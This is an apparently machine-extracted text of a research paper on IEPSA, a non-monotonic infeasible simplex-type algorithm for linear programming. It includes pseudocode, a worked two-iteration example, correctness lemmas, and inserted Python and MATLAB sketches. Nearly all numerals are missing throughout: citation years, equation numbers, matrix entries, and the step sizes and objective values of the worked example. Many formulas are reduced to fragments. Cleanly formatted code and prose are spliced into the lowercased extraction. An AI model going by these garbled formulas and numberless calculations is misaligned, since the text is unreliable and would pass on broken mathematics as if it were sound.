are promising, showing that the new algorithm competes versus the state-of-the-art solvers in the total number of iterations required to converge. subjects algorithms and analysis of algorithms, optimization theory and computation keywords linear programming, simplex-type, interior point method, exterior point, non-monotonic, infeasible, mathematical programming, optimization introduction linear programming (lp) constitutes one of the most fundamental classes of mathematical programming models which is widely used in many scientific areas since many real world problems can be formulated as linear programs (lps) (triantafyllidis & papageorgiou, ; gkioulekas & papageorgiou, ; yang et al., ; amin & emrouznejad, ; janssens & ramaekers, ; fernndez & borrajo, ; burdett et al., ). lp is an important tool nowadays in many applications, spanning across a broad spectrum of fields (bertsimas & tsitsiklis, ). many algorithms have been invented for the solution of lps. the majority of these algorithms can be divided into two main categories: (i) simplex-type or pivoting algorithms and (ii) interior point methods (ipms). the primal simplex algorithm (psa) (dantzig, ) had been the most efficient method for solving lps until the ’s. psa ranked as one of the top algorithms of the th century (dongarra & sullivan, ). it performs well in practice, particularly on lps of small or medium size. nevertheless, psa is not polynomial. its worst-case complexity is exponential (klee & minty, ). 
simplex algorithm visits in a sequential manner adjacent vertices of the feasible region using pivot operations, so that the new vertex has better objective value (monotonic algorithm) compared to the previous one. it is well known that the behavior of this algorithmic family can be improved by modifying: (i) the initial solution and (ii) the pivoting rule. the selection of appropriate pivoting how to cite this article triantafyllidis cp, samaras n. . a new non-monotonic infeasible simplex-type algorithm for linear pro- gramming. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:charalampos.triantafyllidis@oncology.ox.ac.uk mailto:charalampos.triantafyllidis@oncology.ox.ac.uk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. rules affects the number of iterations required for solving lps. different pivoting strategies yield different basis sequences in simplex-type algorithms. the flexibility of the entering and leaving variable selection allows to develop various pivoting schemes. a complete presentation can be found in terlaky & zhang ( ). the first polynomial time algorithm for linear programming was the russian (ellipsoid) algorithm, developed by khachiyan ( ). however, the ellipsoid algorithm is impractical for lp. karmarkar ( ) then invented the first interior point method (ipm); it uses a sequence of interior points and converges to the optimal solution in a few number of iterations. the most important advantage of ipms compared to psa is that the number of iterations is not proportional or related in any manner to the number of vertices. most of the ipms are infeasible in nature (mehrotra, ; mehrotra, ) and it is broadly accepted that an infeasible primal-dual ipm is the most efficient algorithm of this family. the development of ipms has revolutionized the field of mathematical programming and efficient ipms outperform the psa on large-scale lps. despite this fact, lps have continued to receive great scientific analysis lately. more and effective pivoting schemes appeared in the literature (terlaky, ; murty & fathi, ; arsham, ; pan, ; jurik, ; yeh & corley, ; elhallaoui et al., ; li, ). additionally, the papers (basu, loera & junod, ; gleixner, steffy & wolter, ; omer et al., ) proposed a framework for an improved primal simplex algorithm that guarantees an improvement in the objective value after each iteration. also, during the last decades researchers proposed more efficient implementations of simplex-type algorithms. the exterior point simplex algorithm (epsa) was originally developed by paparrizos ( ) for the assignment problem. epsa can avoid the boundary of the polyhedron of the feasible region and constructs two paths to converge to the optimal solution. one path is exterior to the feasible region while the other one is feasible. later on, paparrizos ( ) generalized epsa to lp. the key idea behind epsa is that when using pivots based on feasible directions to select the pair of entering and leaving variables, the algorithm can converge faster to the optimal solution. paparrizos, samaras & tsiplidis ( ) have demonstrated that the geometry of epsa reveals that this algorithm is faster than psa. this result was partially verified by preliminary computational results (paparrizos, samaras & stephanides, a; paparrizos, samaras & triantafyllidis, ). 
a well established way to improve epsa is to transform its exterior path into a dual feasible simplex path. such an algorithm is called primal-dual exterior point simplex algorithm (pdepsa) (paparrizos, ). this algorithm requires an initial dual feasible basic solution. since such a solution is not always readily available, a modified big-m method is applied. variations of using a two-phase approach for the epsa were presented in triantafyllidis & samaras ( ). the main advantage of pdepsa is its promising computational performance. an important improvement of the pdepsa is to traverse across the interior of the feasible region, in an attempt to avoid degenerate vertices of vertex-following algorithms. this algorithm is called primal-dual interior point simplex algorithm (pdipsa) (samaras, ). pdipsa can be seen as a separate procedure to move from any interior point to an optimal basic solution. it can be combined with ipms in order to develop a hybrid algorithm consisting of two stages (glavelis, ploskas & samaras, ). at first stage, an triantafyllidis and samaras ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ipm is applied and at the second stage pdipsa is applied to compute an optimal basic solution. the main advantage of this hybrid algorithm is that it exploits the strengths of both ipm and pdipsa. the computational results are very encouraging. a complete review of exterior point algorithms can be found in paparrizos, samaras & sifaleras ( ). a review paper summarizing the advantages and disadvantages of pivots, ellipsoid and ipms was presented by illes & terlaky ( ). several methods have been developed which provide a combination of ipms with pivoting algorithms (bixby et al., ; bixby & saltzman, ; andersen & ye, ; pan, ). all the above mentioned algorithms are monotonic in nature. a monotonic linear optimization algorithm starts with a (feasible or infeasible) vertex, moves between (adjacent or not) vertices, improving the value of the objective function until an optimal solution is found. in this paper a non-monotonic infeasible simplex-type algorithm for general lp is presented. the proposed method does not maintain monotonicity on the basic solutions, but only on the interior point which is used to construct the feasible direction at each iteration. this new algorithm is comprised of three different parts: (i) interior exterior primal simplex algorithm (iepsa), (ii) exterior point simplex algorithm (epsa) and (iii) primal-dual interior point simplex algorithm (pdipsa). the first one (iepsa) interconnects a primal interior point with a primal (infeasible) exterior one. using these two points, a feasible direction is constructed and while iterating in a non-monotonic way the algorithm stops at either a primal or a dual feasible solution. on the other hand iepsa improves strictly from iteration to iteration the objective value at the interior point. the exterior point reaches optimality independently of the monotonicity of the interior point. in conclusion, we have non-monotonic movement outside the feasible region and monotonic movement in the interior of the feasible region. in order to gain insight into the practical behavior of the proposed algorithm, we have performed some computational experiments on a set of benchmark problems (netlib, kennington, mészáros). 
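to make the three-part scheme concrete, the sketch below outlines the quantities iepsa works with: the basic solution and reduced costs of a partition, the two ratio tests that intersect the current direction with the feasible region, and the test that decides whether epsa or pdipsa should take over. it is an illustration in python/numpy only, anticipating the formal description in 'materials & methods'; the published implementation is in matlab, epsa and pdipsa themselves are not shown, and the pivot selection of the iepsa pseudocode is omitted.

```python
# illustrative sketch of the quantities iepsa works with; not the authors'
# matlab implementation. epsa and pdipsa (the second stage) are not shown.
import numpy as np

def basic_quantities(A, b, c, basis):
    """basic solution x_B and reduced costs s_N for a basic partition [B N]."""
    B_inv = np.linalg.inv(A[:, basis])          # lu factorization in practice
    x_B = B_inv @ b
    y = B_inv.T @ c[basis]                      # dual variables w
    s = c - A.T @ y                             # reduced costs (zero on basic columns)
    nonbasis = np.setdiff1d(np.arange(A.shape[1]), basis)
    return x_B, s[nonbasis], nonbasis

def iepsa_boundary_points(x_current, x_interior, x_B, basis):
    """intersect d = x_interior - x_current with the feasible region.
    x_current is the basic solution embedded in R^n (nonbasic components zero);
    alpha gives the exiting point aa, beta the entering point bb, and their
    midpoint is shown to be interior in the 'proof of correctness' section."""
    d = x_interior - x_current
    d_B = d[basis]
    neg_d, neg_x = d_B < 0, x_B < 0
    alpha = np.min(x_B[neg_d] / -d_B[neg_d]) if neg_d.any() else np.inf  # +inf => unbounded
    beta = np.max(-x_B[neg_x] / d_B[neg_x]) if neg_x.any() else 0.0
    aa, bb = x_current + alpha * d, x_current + beta * d
    return aa, bb, 0.5 * (aa + bb)

def stage_of(x_B, s_N):
    """which algorithm takes over: keep iterating iepsa while the basis is
    neither primal nor dual feasible, then hand over to epsa or pdipsa."""
    if np.all(x_B >= 0):
        return "primal feasible: switch to epsa"
    if np.all(s_N >= 0):
        return "dual feasible: switch to pdipsa"
    return "continue iepsa (pivot as in the iepsa pseudocode)"
```

a full driver would loop these pieces: while the basis is neither primal nor dual feasible, compute the boundary points, keep the better interior point, pivot, and finally hand over to epsa or pdipsa; the worked example later in the paper traces two such iterations on a small problem.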
the computational results demonstrate that the proposed non- monotonic algorithm requires less iterations than both the primal-simplex algorithm implemented in cplex and gurobi commercial solvers. this paper is organized as follows: in ‘materials & methods’ a brief reference to some basic notation for the linear problem and the algorithms described in this paper is given. subsection iepsa presents the proposed algorithm, an illustrative example and its pseudo- code. in the ‘proof of correctness’ subsection, mathematical proofs for the correctness of the algorithm are given. in order to gain an insight into the practical behavior of the proposed algorithm, we performed a computational study. these results are presented in the ‘results’ section, followed by the ‘conclusions’ section. triantafyllidis and samaras ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. materials & methods in this section we give some necessary notation and definitions on lps. consider the following linear program in the standard form: min ct x subject to ax =b, x ≥ ( ) where a∈rm×n, (c,x)∈rn, b∈rm and t denotes transposition. we assume that a has full rank, rank(a)=m, ≤m≤n. if x satisfies ax =b, x ≥ , then x is a feasible solution. the dual problem associated with the eq. ( ) is presented in eq. ( ): max bt y subject to at y+s=c, s≥ ( ) where y ∈rm and s∈rn. using a basic partition (b,n) of a as a=[aban] and the corresponding partitioning of xt =[xbxn], ct =[cbcn], eq. ( ) is written as: min z =ctb xb+c t n xn subject to abxb+an xn =b xb,xn ≥ ( ) in eq. ( ), ab is an m×m non-singular sub-matrix of a, called basic matrix or basis, whereas an is an m×(n−m) sub-matrix of a called non-basic matrix. the columns of a which belong to subset b are called basic and those which belong to n are called non-basic. the solution xb = (ab)− b, xn = is called a basic solution. the solution of eq. ( ) is computed by the relation s=c−at y, where yt =(cb)t (ab)− are the dual variables and s are the dual slack variables. the basis ab is dual feasible iff s≥ . the ith row of the coefficient matrix a is denoted by ai. and the jth column by a.j. notation xb[i] refers to the ith basic variable (ith element of vector xb). in solving lps by pivoting methods, a huge amount of computational effort is consumed on the inversion of the basis ab. the basis is maintained in some factorized form. we use the lu-factorization available in matlab to compute the inverse of the basis in all three algorithms, iepsa, epsa and pdipsa. the iepsa method a common characteristic of the majority of simplex-type algorithms is that they can be described as a process that uses simplex paths which lead to optimal solution. one advantage of the exterior point algorithms is that they use two paths to reach the optimal basis. one is feasible and the other infeasible (exterior). the relaxation of the feasibility constraints seems to be efficient in practice. another potential advantage of epsa is that should the initial direction be feasible (it spans the feasible region), the method can be applied directly on the original problem, without having to first compute an initial feasible basic solution thus completely avoiding phase i. this is because epsa never loses contact with the feasible region if the initial direction crosses it. on the other hand, one triantafyllidis and samaras ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. 
of the main disadvantages of the epsa is the difficulty of constructing a good moving direction. this drawback can be avoided if the exterior path is replaced with a dual feasible simplex path. it has been shown that by replacing the exterior path of an epsa with a dual feasible simplex path results in an algorithm free from the computational disadvantages of epsa (paparrizos, samaras & stephanides, b). a more effective version is the pdipsa (samaras, ). this algorithm can circumvent the problems of stalling and cycling more effectively and as a result improves the performance of the primal-dual exterior point algorithms. the advantage of pdipsa emanates from the fact that it uses an interior point. the iepsa method is initialized with a pair of initial points: an infeasible basic solution and an interior point. the initial interior point (xinterior) can be computed by applying an ipm in eq. ( ) with ct = . next, it constructs a feasible direction (d =xinterior −xcurrent ) and computes the pair of entering/leaving variables and a new (better) interior point. the above computations continue, swapping infeasible basic solutions on the exterior of the feasible region in a non-monotonic way, and in the interior by using better interior points (monotonic movement) in order to construct the search directions. the proposed method prioritizes monotonic pivots; however, should there be no monotonic eligible steps, the method moves to the least-worse non-monotonic infeasible basic solution. if iepsa finds a primal feasible basic solution, then the epsa is applied to monotonically converge to the optimal solution. if at any given iteration iepsa moves to a dual feasible partition then pdipsa is applied. with the last interior point and the dual feasible partition from iepsa, pdipsa can also monotonically find the optimal solution. step-by-step description of iepsa and pseudocode the algorithm consists of two phases. in the first phase, the algorithm generates a sequence of points (xiinterior,x i exterior), i= , , ,...,t , where x i interior is a point in the relative interior of the feasible region for i= ,...,t , and xiexterior is a basic solution to lp, that is infeasible to both the primal and the dual problem for i= ,...,t − . the first phase ends with a pair (xtinterior,x t exterior), where the exterior point is either feasible to the primal or the dual problem. if the first phase ands with a basic feasible solution to the primal, then the second phase runs an algorithm called exterior point simplex algorithm (epsa) from previous literature (paparrizos, ), to obtain the optimal basic feasible solution. if the first phase ends with a dual feasible solution, the second phase runs an algorithm called primal-dual interior point simplex algorithm (pdipsa), also from previous literature (samaras, ). we show that the first phase method always ends with a basic solution that is feasible to either the primal or the dual problem. thus, using the prior results on epsa and pdipsa, the overall algorithm is shown to correctly solve lp. the main idea behind the first phase is the following: the algorithm is ini- tialized with any basic (infeasible) solution x exterior and an interior point x interior, triantafyllidis and samaras ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. found by a standard interior point solver (in this case mosek ipm). at ev- ery iteration, i = , , ,... one computes the intersection of the line passing data: eq. 
( ), infeasible basic partition [b n], interior point xinterior result: primal or dual feasible basic partition [b n] (initialization) compute: (ab)− ,xb,wt,(sn )t xcurrent = [ xb xn ] d =xinterior −xcurrent p = { j∈n : sj < } , q= { j∈n : sj ≥ } (sp)t =(cp)t −wt ap , (sq)t =(cq)t −wt aq (general loop) while xb( ≥ ) do αα=xcurrent +αd : α= xb[ra] −db[ra] =min { xb[i] −db[i] :db[i]< } ,∀i= ,...,m ββ=xcurrent +βd : β= xb[rb] −db[rb] =max { xb[i] −db[i] :xb[i]< } ,∀i= ,...,m if α=+∞ then stop-eq. is unbounded. else find xmiddle = αα+ββ if ct xmiddle <ct xinterior then xinterior =xmiddle else if ct xmiddle =ct xinterior then α=min { (xinterior )[i] c[i] :−c[i]< } xinterior =xinterior + α (−c t ) else d =xinterior −xmiddle α=min { (xinterior )[i] −(d)[i] :(d)[i]< } xinterior =xinterior + α d end if end if compute: xb[rb]=xk hrp =((ab) − )rb.ap hrq =((ab) − )rb.aq, θ = −sp hrp =min { −sj hrj :hrj < ,j∈p } θ = −sq hrq =min { −sj hrj :hrj < ,j∈q } (pivot-update) find t ,t : p(t )=p , q(t )=q. if θ ≤θ then l =p. else l =q end if find t : n(t)= l. set n(t)=k , b(rb)= l . update: (ab)− , xb,wt,(sn )t,(sp)t,(sq)t , p,q, xcurrent = [ xb xn ] , d =xinterior −xcurrent end if end while algorithm : iepsa triantafyllidis and samaras ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure flow diagram of iepsa. full-size doi: . /peerjcs. /fig- through xiexterior and x i interior with the feasible region. this gives a line segment l (assuming the problem is bounded) with midpoint ximiddle. otherwise, one takes a half-step from the current xiinterior in the direction of x i middle and sets this as the new x i+ interior. one also computes the endpoint of the line segment l closest to xiinterior. this endpoint lies on some facet of the feasible region. this facet dictates which nonbasic variable will enter the basis and an appropriate exiting variable is selected. this then gives the new basic solution xi+ exterior. a flow diagram of iepsa combined with epsa and pdipsa to provide an integrated solver for lp is shown in fig. . a formal description of the iepsa method is given in algorithm . an example we will briefly demonstrate the iepsa method in a simple example. points {αα,ββ} represent the exiting and entering boundary points correspondingly for each feasible direction spanning the polyhedron. assume we are given the following linear programming problem: max z =x + x subject to x − x ≤ −x + x ≤ x + x ≤ − x − x ≤ − x − x ≤ − x − x ≤ xi ≥ ,∀i∈{ , } ( ) the corresponding feasible region is depicted in fig. . there exist in total eight different variables after the addition of the slack ones. the axis system represents variables x (y= ) and x (x= ). the numbers with p in brackets on the right at each basic solution stand for the number of elements in vector p. the optimal point is [ , . ] and the optimal objective triantafyllidis and samaras ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure feasible region and duality on vertexes for eq. ( ). full-size doi: . /peerjcs. /fig- value is z = . . after the addition of the slack variables we have: a=   − − − − − −   ,c = [ − ,− , , , , , , ] ,b=   − −   initialization assume we start with the infeasible partition b=[ , , , , , ], n =[ , ] and the following interior point xinterior (calculated from mosek’s ipm). all the appropriate computations are: (ab) − =   . − . . . − . 
  ,(sn ) t = [ . ,− . ] ,wt = [ , , , . , , ] triantafyllidis and samaras ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. xb=   − . . . − . . −   ,xcurrent =   . − . . . − . −   ,xinterior =   . . . . . . . .   here w are the dual variables. the n set of indexes actually represents the current non-basic solution. in our case [ , ] is the -d point [ . , ]. a feasible direction d is then constructed by connecting the interior point with the infeasible basic solution: d =xinterior −xcurrent =   . . . . . . . .   −   . − . . . − . −   =   − . . . − . . . . .   mapping now the direction d on the basic variables we get db: db=   . − . . . − . .   also we have p =[ ]and q=[ ]. the direction from the initial infeasible basic solution ( . , ) to the interior point is shown in fig. . since xcurrent is our initial infeasible basic solution and d is our current feasible direction, this direction intersects the feasible region at an exiting point aa (as shown in fig. ) which can be calculated using the relations below: general loop - iteration α= xb[r] −db[r] =min { xb[i] −db[i] :db[i]< } =min { xb[ , ] −db[ , ] } =min { . . , . . } = min{ . , . }= . triantafyllidis and samaras ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure constructing the first direction for eq. ( ). full-size doi: . /peerjcs. /fig- αα=xcurrent +αd =   . − . . . − . −   + .   − . . . − . . . . .   =   . . . . . . .   in a similar manner, the entering point bb (as shown in fig. ) can be calculated using a maximum ratio test: β= −xb[r] db[r] =max { −xb[i] db[i] :xb[i]< } =max { −xb[ , , ] db[ , , ] } = max { − . − . , − . − . , − − . } =max{ . , . , . }= . hence, rb = , then the rd element of [ , , ] is r = . the entering point then is: ββ=xcurrent +βd =   . − . . . − . −   + .   − . . . − . . . . .   =   . . . . . . .   triantafyllidis and samaras ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. it is easy now to compute the middle point middle (as shown in fig. ) between αα−ββ: xmiddle = αα+ββ =   . . . . . . . .   we observe the following: • both exiting and entering points have only one zero element which was expected since both points are boundary in a -d problem • maximum step size β is less than the minimum step α so as the entering point is closer to the infeasible basic solution and the exiting furthest as expected, since the direction will intersect the feasible region • these two boundary points define a unique feasible ray segment from ββ to αα (ββ→αα) • the objective function value at ββ is better than in αα (direction is non-improving) and the objective function value at the middle point is better than the initial interior point. since the middle point has better objective value than the initial interior point (it is: zmiddle = (ct middle)=[− . ,− . ]=− . and zxinterior = (c t xinterior)= [− . ,− . ]=− . ) we keep this middle point as an improved interior point for the next iteration. 
we now choose the leaving variable according to ββ boundary point: k= ,r = . the variable xb(r)=xk =x is leaving the basis. we can now move on, to select the entering variable xl: hrp =b − a.p =[ ]> hrq=b − a.q=[− ]< l = ,t = ,p =[ ],q=[ ] θ =[ ],θ =[ . ] since only θ could be computed, the selection is done using the set q. variable xl =x is entering the basis. the pivot operation now updates the basic and non-basic index lists triantafyllidis and samaras ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. as shown below: b= [ , , , , , ] ,n = [ , ] ,(ab) − =   − . − . . . . − . − . − . − . . − . − .   , (sn ) t = [ . ,− . ] ,wt = [ , , , . , ,− . ] , xb=   . . . − . . .   ,xcurrent =   . . . . . − .   note that xb≤ in this pivot. the new direction d =xmiddle−xcurrent now is: d =   . . . . . . . .   −   . . . . . − .   =   − . . . − . − . . . .   h⇒db=   . − . − . . − . .   general loop: iteration the new exiting boundary point aa (as shown in fig. ) is: α= xb[r] −db[r] =min { xb[i] −db[i] :db[i]< } =min { xb[ , , ] −db[ , , ] } =min { . . , . . , . . } =min{ . , . , . }= . αα=xcurrent +αd =   . . . . . − .   + .   . . . − . − . . . .   =   . . . . . .   triantafyllidis and samaras ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure constructing the second direction for eq. ( ). full-size doi: . /peerjcs. /fig- correspondingly, the entering point bb (as shown in fig. ) can be calculated using the maximum ratio test: β= −xb[r] db[r] =max { −xb[i] db[i] :xb[i]< } =max { −xb[ ] db[ ] } =max { − . − . } = . hence, rb= so r = . the entering point then is: ββ=xcurrent +βd =   . . . . . − .   + .   − . . . − . − . . . .   =   . . . . . . .   the new middle point middle (as shown in fig. ) between αα−ββ is now: xmiddle = αα+ββ =   . . . . . . . .   the variable xb(r)=xk =x ,r = is leaving the basis. we can now move on to select the entering variable xl: triantafyllidis and samaras ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. p =[ ],q=[ ] hrp =(ab) − a.p =[− . ]< hrq=(ab) − a.q=[− . ]< l = ,t = ,p =[ ],q=[ ] θ =[− . ],θ =[ . ] since θ ≤θ the selection is done using the set p. variable xl =x is entering the basis. the pivot operation now updates the basic and non-basic index lists as shown below: b= [ , , , , , ] ,n = [ , ] (ab) − =   − . − . . . . − . − . . − . . − . .   ,(sn ) t = [ . ,− . ] , wt = [ , , , , . ,− . ] ,xb=   . . . . . .   note that xb≥ in this pivot. method iepsa stops here. the basic solutions constructed as shown in fig. are c →g→a . in practice, epsa would take over and finish the optimization moving with one extra iteration to the optimal vertex from the feasible vertex a . note that in the second pivot, the middle point (middle ) constructed could have worse objective function than middle (although it seems better in this case). we did not calculate it on purpose here, since the second basic solution constructed is feasible. 
The sequence of the objective function value at each pair of basic solutions, with the corresponding interior points, is shown below:

Basic solutions: [ z(C), z(G), z(A) ]
Interior points: [ z(x_interior) → improved → z(x_middle,1) → improved → z(x_middle,2) ]

Proof of correctness

The proposed method consists of three different algorithms. Besides IEPSA (the non-monotonic part), the other two (EPSA and PDIPSA) have already been proven to be correct and finite; for more details see Paparrizos, Samaras & Stephanides (a, b). Since the nature of IEPSA is non-monotonic, its finiteness cannot be verified by proving that the algorithm improves the objective function value at each iteration. Therefore IEPSA's finiteness relies on the non-cycling property. We will now use the same notation used in Zhang with respect to sign properties and the simplex tableau. Later on we will adjust to what is proven in Fukuda & Terlaky and explain how this information affects IEPSA's finiteness.

With respect to the basic partition [B N] we call the following augmented matrix a simplex tableau, where:

[a_ij] of size |B| × |N| = (A_B)^{-1} A_N
{ s_j | j ∈ N } = (c_N)^T − (c_B)^T (A_B)^{-1} A_N
{ x_i | i ∈ B } = (A_B)^{-1} b
z = (c_B)^T (A_B)^{-1} b

It is well known that if x_B ≥ 0 the basis is primal feasible, and if s_N ≥ 0 the basis is dual feasible. If both apply, the current basis is optimal. No primal or dual feasibility is required in IEPSA, and the value of the objective function does not necessarily improve in a monotonic way.

Let us start by focusing on the correctness first. We have to prove that at each iteration an available pivot is always given. This means that both the selection of the entering variable and the selection of the leaving variable are well defined. First let us provide a series of proofs about the monotonicity of the interior point that IEPSA uses to construct the feasible direction at each iteration.

Lemma: A direction from an infeasible (exterior) point to an interior one intersects the feasible region in a unique pair of entering/leaving points.

Proof: Assume the polyhedron X = { x | Ax ≥ b }. Let the points αα, ββ be computed as presented in the IEPSA algorithm:

αα = x_current + α d,  ββ = x_current + β d.

Since x_interior and the points αα, ββ lie on the same direction, the interior point is a convex combination of them:

x_interior = λ αα + (1 − λ) ββ > 0,  λ ∈ (0, 1).

So for each element i of x_interior the following applies:

λ αα_i + (1 − λ) ββ_i > 0,  ∀ i = 1, ..., m,

hence αα_i + ββ_i > 0. So there is no index i for which both elements of αα and ββ are equal to zero. This means that the points αα and ββ lie on different hyperplanes of the feasible region.

Lemma: Given a pair of a primal infeasible basic solution x_current and an interior point x_interior, the direction d = x_interior − x_current intersects the feasible region in a pair of leaving/entering boundary points αα, ββ, and the middle point x_middle = (αα + ββ)/2 is also interior.

Proof: We use contradiction. Assume that x_middle is not interior. From the previous lemma we know that the entering (ββ ≥ 0) and leaving (αα ≥ 0) boundary points are not the same. For the middle point we have x_middle = (αα + ββ)/2 ≥ 0. Since x_middle is not an interior point, there exists at least one element i equal to zero, i.e. αα_i + ββ_i = 0, which contradicts the previous lemma. So x_middle is interior (x_middle > 0).
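For reference, the tableau quantities defined above can be computed directly from a basic partition. The fragment below uses random data purely to show how each block is obtained; it is not part of the authors' implementation.

```matlab
% small illustration of the simplex-tableau quantities (random data)
rng(1);
m = 3; n = 5;
A = randn(m, n);  b = randn(m, 1);  c = randn(n, 1);
Bidx = [1 2 3];  Nidx = [4 5];          % a basic partition [B N]

AB = A(:, Bidx);  AN = A(:, Nidx);
xB = AB \ b;                            % {x_i | i in B} = inv(A_B) * b
w  = AB' \ c(Bidx);                     % dual variables (simplex multipliers)
sN = c(Nidx) - AN' * w;                 % {s_j | j in N}, the reduced costs
H  = AB \ AN;                           % inv(A_B) * A_N
z  = c(Bidx)' * xB;                     % objective value at the basic solution

primalFeasible = all(xB >= 0);          % x_B >= 0
dualFeasible   = all(sN >= 0);          % s_N >= 0
```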
Lemma: From a given interior point, the half step of the minimum ratio test computed for any given descending direction results in a strictly better interior point.

Proof: Let x_interior be the first interior point. For a given descending direction d, it is well known that the minimum ratio test computes the largest step we can move along the direction d while preserving feasibility:

α = x_B[r_a] / (−d_B[r_a]) = min{ x_B[i] / (−d_B[i]) : d_B[i] < 0 },  i = 1, ..., m.

The new interior point is x'_interior = x_interior + (α/2) d. Suppose now that x'_interior is not strictly better. We have:

c^T x_interior ≤ c^T x'_interior ⇔ c^T x_interior − c^T x'_interior ≤ 0 ⇔ c^T (x_interior − x'_interior) ≤ 0.

If we substitute x'_interior we get:

c^T (x_interior − x_interior − (α/2) d) ≤ 0 ⇔ −(α/2) c^T d ≤ 0,

which is a contradiction since c^T d < 0. Hence the new interior point x'_interior has a better objective value.

Lemma: At each iteration of IEPSA, the direction d intersects the feasible region.

Proof: The three previous lemmas immediately imply that at each iteration we construct the direction towards an interior point. Thus each direction intersects the feasible region.

Theorem: At each iteration of IEPSA, the objective value at the interior point x_interior strictly decreases.

Proof: IEPSA starts by constructing the direction towards an interior point. The first lemma implies that the entering and leaving points for this direction are not the same. The algorithm then constructs at each iteration the middle point of the entering feasible ray segment. The second lemma shows that this point is also interior. It then compares the two interior points and acts accordingly to secure the construction of a better interior point. By exploiting the non-monotonicity on the infeasible basic solutions, which may produce middle interior points worse than in previous iterations, and thus offering a descending direction between these two points, we can still provide improvement on the interior point. The half-step lemma promotes the monotonicity in the interior of the feasible region. We examine each possible case. The possible combinations for the objective function value between the points x_middle and x_interior are shown below:

• c^T x_middle < c^T x_interior: This case is trivial to examine. We directly acquire a better interior point due to the relative geometric position of the points.

• c^T x_middle = c^T x_interior: Since the objective function value is the same at both points, they either coincide or lie on a hyperplane perpendicular to the objective function vector c. We use d = −c in that case, since the latter is a descending direction and no direction can be constructed between the two points. Using the half-step lemma, the new interior point will have a better objective function value than the previous one.

• c^T x_middle > c^T x_interior: We have

c^T x_middle > c^T x_interior ⇔ c^T x_interior − c^T x_middle < 0 ⇔ c^T (x_interior − x_middle) < 0 ⇔ c^T d < 0,

so the direction d = x_interior − x_middle is a descending direction. According to the half-step lemma, the interior point constructed in the next iteration using half of the minimum ratio step from the point x_interior will be better. So in this case a better interior point is also constructed.

For all the possible combinations an improved interior point can be constructed. Thus IEPSA maintains monotonicity on the interior points.
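The three cases of the theorem can be condensed into a small decision routine. The sketch below is only illustrative: the helper enforces only the nonnegativity bounds, the function names are invented, and it is not the authors' code.

```matlab
function xNew = improve_interior(c, xInterior, xMiddle)
% Decide how to obtain the next (better) interior point, following the
% three cases of the theorem above (illustrative sketch only).
zM = c' * xMiddle;   zI = c' * xInterior;
if zM < zI
    xNew = xMiddle;                      % case 1: the middle point is already better
elseif zM == zI
    xNew = halfStep(xInterior, -c);      % case 2: step along -c, a descending direction
else
    d    = xInterior - xMiddle;          % case 3: c'*d < 0, so d is descending
    xNew = halfStep(xInterior, d);
end
end

function xNew = halfStep(x, d)
% Half of the largest step keeping x + t*d >= 0 (only the nonnegativity
% bounds are treated here; equality constraints are handled as in the paper).
neg = d < 0;
if any(neg)
    t = min(x(neg) ./ (-d(neg)));        % minimum-ratio test
else
    t = 1;                               % unbounded along d; any positive step keeps x >= 0
end
xNew = x + (t/2) * d;
end
```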
Lemma: At each iteration of IEPSA, a leaving variable is always eligible.

Proof: Assume that at some iteration x_interior > 0 is the current interior point and x_current, with at least one negative component, is the current infeasible basic solution. From the constraints of the problem we have:

(A x_current = b and A x_interior = b) ⇔ A x_interior = A x_current ⇔ A (x_interior − x_current) = 0 ⇔ A d = 0.

Hence d is a direction. The maximum ratio test is then given by:

β = −x_B[r] / d_B[r] = max{ −x_B[i] / d_B[i] : x_B[i] < 0 },  i = 1, ..., m,

and we now need to prove that β > 0. We have d = x_interior − x_current; for every component i with x_current[i] < 0, since x_interior[i] > 0, it follows that d[i] > 0. Thus the columns entering the maximum ratio test yield positive ratios, so β > 0 is computable.

Lemma: If a pivot from an infeasible basic solution B → B′ is admissible for IEPSA, then the reverse pivot B′ → B is not.

Proof: First we analyze the sign properties of the algorithm. Assume that k is the leaving variable (k ∈ B) and l is the entering one (l ∈ N). The difference in the objective function value between two consecutive extreme points [B, N] and [B′, N′] is given by:

z′ − z = Δz = (s_N)_l (x_B′)_l.

We also know that the revised updating equation for the basic solution x_B is:

x_B′ = x_B − (f/g) h_.l,  where f = x_B(r), g = h_rl, h_.l = (A_B)^{-1} A_.l.

The algorithm selects the entering variable so that h_rN = [h_rP h_rQ] < 0, thus h_rl = g < 0. This means that the intersection of the pivot row and the pivot column, the pivot element, is always negative for IEPSA. For the pivot row it also holds that f = x_B(r) = x_k < 0. So:

x_B′(l) = x_l = f/g = (negative)/(negative) > 0.

This means that the leaving (negative) variable is replaced by a positive one after the pivot. Since the pivot B′ → B is the reverse of B → B′, the variable that just entered the basis, and is now positive, cannot be selected as leaving in the next pivot, because the leaving variable is always selected by the maximum ratio test and is therefore negative.

Lemma: If IEPSA selects the entering variable from the set P then the step is monotonic; if it is selected from the set Q then the step is non-monotonic.
Figure: Pivot type I (set P). The entering column has a negative reduced cost s_l and a negative pivot element; the leaving variable x_k is negative.

